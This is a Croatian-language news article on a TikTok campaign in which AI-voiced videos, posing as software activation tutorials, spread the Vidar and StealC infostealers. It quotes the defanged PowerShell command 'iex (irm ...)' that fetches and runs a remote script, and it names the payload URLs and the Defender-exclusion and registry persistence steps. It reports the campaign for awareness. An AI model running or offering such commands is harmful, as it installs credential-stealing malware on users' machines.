Kibernetički kriminalci otkrili su novi način širenja malvera, koristeći masovnu bazu korisnika i algoritamski doseg TikToka.
Pojava složene kampanje društvenog inženjeringa koristi videozapise generirane umjetnom inteligencijom kako bi namamili korisnike da preuzmu opasan malver koji krade informacije, prerušen u upute za aktivaciju softvera.
Ovi obmanjujući videozapisi obećavaju pomoć korisnicima pri aktivaciji legitimnih aplikacija poput Windows OS-a, Microsoft Officea, CapCuta i Spotiifija, ali umjesto toga isporučuju poznate “infostealere” Vidar i StealC nesuđenim žrtvama.
Ova kampanja predstavlja značajan napredak u taktici distribucije malvera, udaljavajući se od tradicionalnih metoda isporuke putem interneta i iskorištavajući povjerenje i angažman inherentne platformama društvenih medija.
Za razliku od uobičajenih napada koji se oslanjaju na zlonamjerne web-lokacije ili phishing putem e-pošte, ova operacija ugrađuje sve elemente društvenog inženjeringa izravno unutar video sadržaja, čineći detekciju znatno težom za sigurnosna rješenja.
Napad se koristi viralnom prirodom TikToka, pri čemu je jedan zlonamjerni video prikupio gotovo 500.000 pregleda, preko 20.000 lajkova i više od 100 komentara, što pokazuje zabrinjavajući doseg i učinkovitost kampanje.
Analitičari Trend Microa identificirali su više TikToka računa uključenih u ovu operaciju, uključujući @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc i @digitaldreams771, a svi su od tada deaktivirani.
Istraživači su primijetili da su ovi računi objavljivali upečatljivo slične videozapise bez lica i sa glasovima generiranim umjetnom inteligencijom, sugerirajući automatizirani proizvodni proces dizajniran za skalabilnost.
Tehnička sofisticiranost napada postaje očita u metodologiji izvršenja.
Žrtve se upućuju da otvore PowerShell i izvrše naizgled bezazlanu naredbu: iex (irm hxxps://allaivo[.]me/spotify). Ovaj PowerShell skript pokreće višefazni proces zaraze koji demonstrira napredne tehnike izbjegavanja.
Mehanizam zaraze i taktike ustrajnosti
Lanac zaraze malvera otkriva pažljivo orkestrirane korake osmišljene kako bi se osiguralo uspješno kompromitiranje, izbjegavajući pritom detekciju.
Po izvršenju, početni PowerShell skript stvara skrivene direktorije unutar korisnikovih APPDATA i LOCALAPPDATA mapa, odmah dodajući te lokacije na popis izuzeća za Windows Defender kako bi se spriječilo skeniranje antivirusnim programima.
Skript zatim preuzima primarni teret sa hxxps://amssh[.]co/file.exe, koji sadrži varijante malvera Vidar ili StealC.
Mehanizam ustrajnosti uključuje preuzimanje dodatnog PowerShell skripta sa hxxps://amssh[.]co/script[.]ps1 i uspostavljanje ključa registra koji osigurava da se malver izvršava pri pokretanju sustava.
Značajno je da Vidar primjenjuje inovativnu strategiju komande i upravljanja, zloupotrebljavajući legitimne usluge poput Steam profila i Telegram kanala kao “Dead Drop Resolvers” za skrivanje stvarnih adresa C&C servera, čineći napore detekcije i uklanjanja znatno složenijima.